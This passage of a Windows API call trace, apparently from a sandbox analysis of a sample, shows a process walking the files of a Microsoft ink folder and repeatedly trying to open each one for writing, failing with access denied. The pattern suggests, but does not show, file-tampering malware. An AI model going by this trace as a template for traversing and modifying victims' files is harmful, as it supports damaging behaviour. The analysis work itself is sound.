0x34fd0 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.735] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0098.735] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0098.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0098.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0098.736] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.736] AreFileApisANSI () returned 1 [0098.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi", lpUsedDefaultChar=0x0) returned 73 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.736] AreFileApisANSI () returned 1 [0098.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.736] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0098.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 73 [0098.736] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.737] GetFileType (hFile=0x27c) returned 0x1 [0098.737] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.737] CloseHandle (hObject=0x27c) returned 1 [0098.737] AreFileApisANSI () returned 1 [0098.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0098.737] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0098.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 73 [0098.738] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.738] GetLastError () returned 0x5 [0098.738] GetLastError () returned 0x5 [0098.738] SetLastError (dwErrCode=0x5) [0098.738] GetLastError () returned 0x5 [0098.738] SetLastError (dwErrCode=0x5) [0098.738] GetLastError () returned 0x5 [0098.738] SetLastError (dwErrCode=0x5) [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0098.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.738] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.738] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a8750a, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a8750a, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2bfcc, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0098.738] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.738] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0098.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0098.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0098.739] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.739] AreFileApisANSI () returned 1 [0098.739] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi", lpUsedDefaultChar=0x0) returned 69 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.739] AreFileApisANSI () returned 1 [0098.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0098.739] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0098.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 69 [0098.739] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.740] GetFileType (hFile=0x27c) returned 0x1 [0098.740] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.740] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.740] CloseHandle (hObject=0x27c) returned 1 [0098.740] AreFileApisANSI () returned 1 [0098.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0098.740] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0098.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi") returned 69 [0098.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.741] GetLastError () returned 0x5 [0098.741] GetLastError () returned 0x5 [0098.741] SetLastError (dwErrCode=0x5) [0098.741] GetLastError () returned 0x5 [0098.741] SetLastError (dwErrCode=0x5) [0098.741] GetLastError () returned 0x5 [0098.741] SetLastError (dwErrCode=0x5) [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0098.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.741] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.741] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989f72a7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xd1a612b1, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xd1a612b1, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x32e18, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0098.741] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.741] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0098.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0098.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0098.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0098.742] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.742] AreFileApisANSI () returned 1 [0098.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi", lpUsedDefaultChar=0x0) returned 68 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0098.742] AreFileApisANSI () returned 1 [0098.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0098.742] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82688 [0098.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 68 [0098.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0098.743] GetFileType (hFile=0x27c) returned 0x1 [0098.743] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0098.743] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0098.743] CloseHandle (hObject=0x27c) returned 1 [0098.743] AreFileApisANSI () returned 1 [0098.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0098.743] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82c28 [0098.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x82c28, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 68 [0098.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0098.744] GetLastError () returned 0x5 [0098.744] GetLastError () returned 0x5 [0098.744] SetLastError (dwErrCode=0x5) [0098.744] GetLastError () returned 0x5 [0098.744] SetLastError (dwErrCode=0x5) [0098.744] GetLastError () returned 0x5 [0098.744] SetLastError (dwErrCode=0x5) [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82c28 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0098.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.744] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.744] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da3ec5f, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7bf3d600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0098.744] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f90 [0098.744] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0098.744] 